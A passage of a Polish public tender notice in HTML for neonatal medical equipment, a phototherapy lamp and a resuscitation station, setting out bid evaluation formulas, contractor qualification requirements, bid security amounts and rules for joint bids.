zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie, odrębnie w odniesieniu odrębnie do każdej części zamówienia:<br/><br/>1.	Cena (C)	60%	60 punktów<br/>2.	Okres gwarancji jakości (G)	10%	10 punktów<br/>3.	Jakość (J)	30%	30 punktów<br/><br/>2)	Zasady oceny kryteriów<br/>a)	W kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/><br/>P (C) = Cmin/Cbad x Max (C)<br/>	<br/>gdzie:<br/>P(C)	Liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Cena&#34;<br/>Cmin	Najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cbad	Cena oferty badanej<br/>Max (C)	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium „Cena&#34; (60).<br/> W tym kryterium oferta może uzyskać maksymalnie 60 punktów. <br/><br/>b)	W kryterium „Okres gwarancji jakości” oferta otrzyma liczbę punktów: <br/>- za okres gwarancji 24 miesięcy (minimalny okres gwarancji) – 0 pkt, <br/>- za okres gwarancji 25 - 30 miesięcy – 2,0 pkt,<br/>- za okres gwarancji 31 - 36 miesięcy – 4,0 pkt,<br/>- za okres gwarancji 37 - 42 miesięcy – 6,0 pkt,<br/>- za okres gwarancji 43 - 47 miesięcy – 8,0 pkt,<br/>- za okres gwarancji 48 miesięcy i więcej – 10,0 pkt,<br/> <br/>Wykonawca w Formularzu oferty wskazuje okres gwarancji jakości dla danego urządzenia (części zamówienia), z zastrzeżeniem, że nie może być on krótszy niż 24 miesięcy. Maksymalny punktowany okres gwarancji jakości to 48 miesięcy. W przypadku zaoferowania przez wykonawcę dłuższego, niż 48 miesięcy okresu gwarancji jakości zamawiający przyjmie do oceny okres gwarancji wynoszący 48 miesięcy. W przypadku nie wpisania żadnego okresu Zamawiający odrzuci ofertę. <br/>W tym kryterium oferta może uzyskać maksymalnie 10 punktów. <br/><br/>c)	W kryterium „Jakość” oferta w odniesieniu dla danej części zamówienia otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/><br/>P(J) = Jbad/ JN x MaxJ,<br/>gdzie:<br/>P(J)	Liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Jakość&#34;<br/>JN	Największa liczba punktów przyznana ofercie (danej części)<br/>Jbad	Liczba punktów przyznana ofercie badanej<br/>MaxJ	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium „Jakość&#34; (30 pkt).<br/><br/>Punkty za jakość będą przyznawane w oparciu o dołączone przez Wykonawców do ofert wypełnione Tabele parametrów technicznych i eksploatacyjnych dla cz. I - IV, według parametrów określonych w załączniku do SWZ Opis przedmiotu zamówienia dla cz. I – IV .<br/>Najwyższą liczbę punktów za kryterium jakości uzyska oferta, która uzyska najlepsze parametry jakościowe w odniesieniu do wymogów określonych przez Zamawiającego. Każdy z ocenianych parametrów, uznany przez Zamawiającego za najkorzystniejszy uzyska wskazaną w załączniku Opis przedmiotu zamówienia dla cz. I – IV punktację – maksymalną liczbę punktów. Pozostałe oferty uzyskają odpowiednio niższą liczbę punktów.<br/>Zamawiający, w celu ustalenia rankingu ofert przyzna punkty na podstawie deklaracji Wykonawcy zawartych w Załącznikach do ofert – wypełnionych przez Wykonawców Tabelach parametrów technicznych i eksploatacyjnych.<br/>W tym kryterium oferta może uzyskać maksymalnie 30 punktów.<br/><br/>d)	Ostateczna liczba punktów dla każdej z ofert i oddzielnie dla każdej części zamówienia zostanie obliczona wg następującego wzoru:<br/> Oip = P(C) + P(G) + P(J)<br/> <br/>gdzie:<br/> Oip – oznacza łączną ocenę jako sumę punktów w poszczególnych kryteriach<br/> P(C) – liczba punktów uzyskanych w kryterium „Cena”<br/> P(G) - liczba punktów uzyskanych w kryterium „Okres gwarancji jakości”<br/> P(J) – liczba punktów uzyskanych w kryterium „Jakość”<br/><br/>	Oferta może otrzymać maksymalnie 100 punktów dla danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa lampy do fototerapii.<br/>Opis:<br/>Lampa do fototerapii z promiennikiem diodowym LED i oświetleniem ogólnym;<br/>a)	Lampa mocowana na statywie jezdnym z regulacją wysokości lampy;<br/>b)	Zasilanie elektryczne, pobór mocy max. 40W;<br/>c)	Maksimum promieniowania w zakresie 450-480 nm;<br/>d)	Natężenie promieniowania w odległości 30 cm min 40 μW/cm2;<br/>e)	Efektywne pole naświetlania min. 20 x 30 cm;<br/>f)	Intensywność iluminacji wbudowanego oświetlenia światłem białym min. 2000 lx. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33158300-5 - Urządzenia medyczne emitujące promieniowanie ultrafioletowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie, odrębnie w odniesieniu odrębnie do każdej części zamówienia:<br/><br/>1.	Cena (C)	60%	60 punktów<br/>2.	Okres gwarancji jakości (G)	10%	10 punktów<br/>3.	Jakość (J)	30%	30 punktów<br/><br/>2)	Zasady oceny kryteriów<br/>a)	W kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/><br/>P (C) = Cmin/Cbad x Max (C)<br/>	<br/>gdzie:<br/>P(C)	Liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Cena&#34;<br/>Cmin	Najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cbad	Cena oferty badanej<br/>Max (C)	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium „Cena&#34; (60).<br/> W tym kryterium oferta może uzyskać maksymalnie 60 punktów. <br/><br/>b)	W kryterium „Okres gwarancji jakości” oferta otrzyma liczbę punktów: <br/>- za okres gwarancji 24 miesięcy (minimalny okres gwarancji) – 0 pkt, <br/>- za okres gwarancji 25 - 30 miesięcy – 2,0 pkt,<br/>- za okres gwarancji 31 - 36 miesięcy – 4,0 pkt,<br/>- za okres gwarancji 37 - 42 miesięcy – 6,0 pkt,<br/>- za okres gwarancji 43 - 47 miesięcy – 8,0 pkt,<br/>- za okres gwarancji 48 miesięcy i więcej – 10,0 pkt,<br/> <br/>Wykonawca w Formularzu oferty wskazuje okres gwarancji jakości dla danego urządzenia (części zamówienia), z zastrzeżeniem, że nie może być on krótszy niż 24 miesięcy. Maksymalny punktowany okres gwarancji jakości to 48 miesięcy. W przypadku zaoferowania przez wykonawcę dłuższego, niż 48 miesięcy okresu gwarancji jakości zamawiający przyjmie do oceny okres gwarancji wynoszący 48 miesięcy. W przypadku nie wpisania żadnego okresu Zamawiający odrzuci ofertę. <br/>W tym kryterium oferta może uzyskać maksymalnie 10 punktów. <br/><br/>c)	W kryterium „Jakość” oferta w odniesieniu dla danej części zamówienia otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/><br/>P(J) = Jbad/ JN x MaxJ,<br/>gdzie:<br/>P(J)	Liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Jakość&#34;<br/>JN	Największa liczba punktów przyznana ofercie (danej części)<br/>Jbad	Liczba punktów przyznana ofercie badanej<br/>MaxJ	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium „Jakość&#34; (30 pkt).<br/><br/>Punkty za jakość będą przyznawane w oparciu o dołączone przez Wykonawców do ofert wypełnione Tabele parametrów technicznych i eksploatacyjnych dla cz. I - IV, według parametrów określonych w załączniku do SWZ Opis przedmiotu zamówienia dla cz. I – IV .<br/>Najwyższą liczbę punktów za kryterium jakości uzyska oferta, która uzyska najlepsze parametry jakościowe w odniesieniu do wymogów określonych przez Zamawiającego. Każdy z ocenianych parametrów, uznany przez Zamawiającego za najkorzystniejszy uzyska wskazaną w załączniku Opis przedmiotu zamówienia dla cz. I – IV punktację – maksymalną liczbę punktów. Pozostałe oferty uzyskają odpowiednio niższą liczbę punktów.<br/>Zamawiający, w celu ustalenia rankingu ofert przyzna punkty na podstawie deklaracji Wykonawcy zawartych w Załącznikach do ofert – wypełnionych przez Wykonawców Tabelach parametrów technicznych i eksploatacyjnych.<br/>W tym kryterium oferta może uzyskać maksymalnie 30 punktów.<br/><br/>d)	Ostateczna liczba punktów dla każdej z ofert i oddzielnie dla każdej części zamówienia zostanie obliczona wg następującego wzoru:<br/> Oip = P(C) + P(G) + P(J)<br/> <br/>gdzie:<br/> Oip – oznacza łączną ocenę jako sumę punktów w poszczególnych kryteriach<br/> P(C) – liczba punktów uzyskanych w kryterium „Cena”<br/> P(G) - liczba punktów uzyskanych w kryterium „Okres gwarancji jakości”<br/> P(J) – liczba punktów uzyskanych w kryterium „Jakość”<br/><br/>	Oferta może otrzymać maksymalnie 100 punktów dla danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa stanowiska do resuscytacji noworodków.<br/>Opis:<br/>a)	Przyłóżkowe stanowisko okołoporodowe do resuscytacji noworodka umożliwiające podparcie dróg oddechowych oraz umieszczenie niemowlęcia na ciepłej platformie, pozostawiając nienaruszoną pępowinę;<br/>b)	Zapewnia stabilizację oddechową za pomocą resuscytatora oraz ułatwia optymalne zaciśnięcie pępowiny w celu poprawy transfuzji łożyska;<br/>c)	Przyłóżkowe stanowisko okołoporodowe wyposażone jest w: okołoporodową platformą jezdną, system grzewczy, resuscytator noworodkowy, mieszalnik tlen-powietrze, nawilżacz, ssak i uchwyty na dwie butle. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33171200-1 - Przyrządy do resuscytacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie, odrębnie w odniesieniu odrębnie do każdej części zamówienia:<br/><br/>1.	Cena (C)	60%	60 punktów<br/>2.	Okres gwarancji jakości (G)	10%	10 punktów<br/>3.	Jakość (J)	30%	30 punktów<br/><br/>2)	Zasady oceny kryteriów<br/>a)	W kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/><br/>P (C) = Cmin/Cbad x Max (C)<br/>	<br/>gdzie:<br/>P(C)	Liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Cena&#34;<br/>Cmin	Najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cbad	Cena oferty badanej<br/>Max (C)	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium „Cena&#34; (60).<br/> W tym kryterium oferta może uzyskać maksymalnie 60 punktów. <br/><br/>b)	W kryterium „Okres gwarancji jakości” oferta otrzyma liczbę punktów: <br/>- za okres gwarancji 24 miesięcy (minimalny okres gwarancji) – 0 pkt, <br/>- za okres gwarancji 25 - 30 miesięcy – 2,0 pkt,<br/>- za okres gwarancji 31 - 36 miesięcy – 4,0 pkt,<br/>- za okres gwarancji 37 - 42 miesięcy – 6,0 pkt,<br/>- za okres gwarancji 43 - 47 miesięcy – 8,0 pkt,<br/>- za okres gwarancji 48 miesięcy i więcej – 10,0 pkt,<br/> <br/>Wykonawca w Formularzu oferty wskazuje okres gwarancji jakości dla danego urządzenia (części zamówienia), z zastrzeżeniem, że nie może być on krótszy niż 24 miesięcy. Maksymalny punktowany okres gwarancji jakości to 48 miesięcy. W przypadku zaoferowania przez wykonawcę dłuższego, niż 48 miesięcy okresu gwarancji jakości zamawiający przyjmie do oceny okres gwarancji wynoszący 48 miesięcy. W przypadku nie wpisania żadnego okresu Zamawiający odrzuci ofertę. <br/>W tym kryterium oferta może uzyskać maksymalnie 10 punktów. <br/><br/>c)	W kryterium „Jakość” oferta w odniesieniu dla danej części zamówienia otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/><br/>P(J) = Jbad/ JN x MaxJ,<br/>gdzie:<br/>P(J)	Liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Jakość&#34;<br/>JN	Największa liczba punktów przyznana ofercie (danej części)<br/>Jbad	Liczba punktów przyznana ofercie badanej<br/>MaxJ	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium „Jakość&#34; (30 pkt).<br/><br/>Punkty za jakość będą przyznawane w oparciu o dołączone przez Wykonawców do ofert wypełnione Tabele parametrów technicznych i eksploatacyjnych dla cz. I - IV, według parametrów określonych w załączniku do SWZ Opis przedmiotu zamówienia dla cz. I – IV .<br/>Najwyższą liczbę punktów za kryterium jakości uzyska oferta, która uzyska najlepsze parametry jakościowe w odniesieniu do wymogów określonych przez Zamawiającego. Każdy z ocenianych parametrów, uznany przez Zamawiającego za najkorzystniejszy uzyska wskazaną w załączniku Opis przedmiotu zamówienia dla cz. I – IV punktację – maksymalną liczbę punktów. Pozostałe oferty uzyskają odpowiednio niższą liczbę punktów.<br/>Zamawiający, w celu ustalenia rankingu ofert przyzna punkty na podstawie deklaracji Wykonawcy zawartych w Załącznikach do ofert – wypełnionych przez Wykonawców Tabelach parametrów technicznych i eksploatacyjnych.<br/>W tym kryterium oferta może uzyskać maksymalnie 30 punktów.<br/><br/>d)	Ostateczna liczba punktów dla każdej z ofert i oddzielnie dla każdej części zamówienia zostanie obliczona wg następującego wzoru:<br/> Oip = P(C) + P(G) + P(J)<br/> <br/>gdzie:<br/> Oip – oznacza łączną ocenę jako sumę punktów w poszczególnych kryteriach<br/> P(C) – liczba punktów uzyskanych w kryterium „Cena”<br/> P(G) - liczba punktów uzyskanych w kryterium „Okres gwarancji jakości”<br/> P(J) – liczba punktów uzyskanych w kryterium „Jakość”<br/><br/>	Oferta może otrzymać maksymalnie 100 punktów dla danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakośc</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, w zakresie zdolności technicznej lub zawodowej: <br/>zrealizowali w okresie ostatnich trzech lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę sprzętu medycznego o wartości: min. 150 000 zł brutto dla I części zamówienia, min. 50 000 zł brutto dla II części zamówienia, min. 15 000 zł brutto dla III części zamówienia i min. 50 000 zł brutto dla IV części zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie o braku podstaw do wykluczenia z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik nr 2 do IDW-SWZ;<br/>b) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, zgodnie ze wzorem oświadczenia stanowiącym Załącznik nr 2a do IDW-SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie ze wzorem oświadczenia stanowiącym Załącznik nr 3 do IDW-SWZ;<br/>b)	Wykaz wykonanych dostaw wykonanych nie wcześniej niż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawy te zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy, sporządzony wg wzoru stanowiącego Załącznik Nr 4 do IDW-SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga przedłożenia nw. przedmiotowych środków dowodowych służących potwierdzeniu zgodności oferowanego przedmiotu zamówienia z wymaganiami Zamawiającego określonymi w Opisie przedmiotu zamówienia - załączonym do SWZ dla części I- IV:<br/>a)	Oświadczenie o posiadaniu dokumentów dopuszczających do stosowania w obrocie medycznym na rynku polskim (np. deklaracja zgodności wraz z certyfikatem jednostki notyfikowanej lub wpis do rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używanie lub inny dokument równoważny – określone w ustawie z 20.05.2010 r. o wyrobach medycznych (tj. Dz.U. z 2020 poz. 186 ze zm.) oraz przepisach wykonawczych do tej ustawy.<br/>b)	Katalogi (prospekty) oraz materiały informacyjne w języku polskim wraz z zaznaczeniem części zamówienia, której dotyczy.<br/>c)	Karty techniczne gotowych wyrobów medycznych - wystawione przez producenta. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a)	Oświadczenie o posiadaniu dokumentów dopuszczających do stosowania w obrocie medycznym na rynku polskim (np. deklaracja zgodności wraz z certyfikatem jednostki notyfikowanej lub wpis do rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używanie lub inny dokument równoważny – określone w ustawie z 20.05.2010 r. o wyrobach medycznych (tj. Dz.U. z 2020 poz. 186 ze zm.) oraz przepisach wykonawczych do tej ustawy.<br/>b)	Katalogi (prospekty) oraz materiały informacyjne w języku polskim wraz z zaznaczeniem części zamówienia, której dotyczy.<br/>c)	Karty techniczne gotowych wyrobów medycznych - wystawione przez producenta. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1)	Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 1 do SWZ;<br/>2)	Przedmiotowe środki dowodowe: szczegółowo określone w pkt 11 ppkt 19) lit. a) - c) SWZ; <br/>3)	Oświadczenia, o których mowa w pkt 11.1) SWZ;<br/>4)	Oświadczenie, o którym mowa w pkt 13.3) SWZ (jeżeli dotyczy);<br/>5)	Zobowiązanie, o których mowa w pkt 13.4) SWZ (jeżeli dotyczy);<br/>6)	Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego zasoby: <br/>a) zamawiający w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru; <br/>b) wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. <br/>c) jeżeli w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), zamawiający żąda od wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy.<br/>7)	Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy);<br/>8)	Tabele parametrów technicznych i eksploatacyjnych oferowanych urządzeń medycznych, oddzielnie dla każdej części zamówienia, według wzorów zamieszczonych w załączniku nr 1 do SWZ – Formularzu oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Zamawiający żąda od Wykonawców wniesienia wadium w kwocie:<br/>- dla części 1: dostawa ultrasonografu – 2 300,00 PLN,<br/>- dla części 2: dostawa respiratora dla noworodków – 700,00 PLN,<br/>- dla części 3: dostawa lampy do fototerapii – 200,00 PLN,<br/>- dla części 4: dostawa stanowiska do resuscytacji noworodków – 800,00 PLN.<br/>2)	Wadium wnosi się przed upływem terminu składania ofert.<br/>3)	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019 r. 310, 836 i 1572).<br/>4)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/>w PKO BP SA: IBAN PL96 1020 3147 0000 8402 0102 7978,<br/> Kod SWIFT/BIC: BPKOPLPW <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu <br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	Oświadczenia, o których mowa w pkt. 11.1) SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału <br/>w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>b)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 11.1) SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>− w pkt. 11.1) b) SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku;<br/>− w pkt. 11.1) a) SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3)	Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) 